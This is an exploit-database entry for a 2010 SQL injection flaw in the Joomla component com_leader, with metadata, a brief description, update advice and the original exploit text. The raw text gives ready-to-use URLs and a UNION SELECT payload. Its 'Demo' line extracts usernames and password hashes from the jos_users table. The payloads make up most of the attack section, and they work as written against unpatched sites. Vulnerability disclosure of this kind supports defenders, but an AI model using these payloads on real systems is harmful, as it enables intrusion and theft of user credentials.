header-logo
Suggest Exploit
vendor:
com_leader
by:
DevilZ TM
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_leader
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component com_leader SQL Injection Vulnerability

The vulnerability exists in the 'com_leader' component of Joomla. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'id' in the 'view' task of the component. An example of the malicious query is '-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11 FROM jos_users'. This query will allow the attacker to extract data from the database.

Mitigation:

The vendor has released an update to address this vulnerability. It is recommended to update the component to the latest version.
Source

Exploit-DB raw data:

# Title : Joomla Component com_leader SQL Injection Vulnerability 
# Author: DevilZ TM
# Data  : 2010-03-11

[~]######################################### InformatioN #############################################[~]
 
[~] Title     : Joomla Component com_leader SQL Injection Vulnerability 
[~] Author    : DevilZ TM By D3v1l
[~] Homepage  : http://www.DEVILZTM.com
[~] Contact   : DevilZTM@Gmail.CoM & D3v1l.blackhat@yahoo.com
 
[~]#########################################   ExploiT   #############################################[~]
 
[~] Vulnerable File :
 
http://127.0.0.1/index.php?option=com_leader&Itemid=3160&task=view&id=[SQL]
 
[~] ExploiT         :
 
-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11 FROM jos_users
 
[~] Example         :
 
http://127.0.0.1/index.php?option=com_leader&Itemid=3160&task=view&id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11 FROM jos_users

[~] Demo            :

http://server/index.php?option=com_leader&Itemid=3160&task=view&id=-498 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 FROM jos_users
 
 
[~]######################################### ThankS To ... ############################################[~]
 
[~] Special Thanks To My Best FriendS :
 
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
 
[~] IRANIAN Young HackerZ
 
[~]#########################################   FinisH :D   #############################################[~]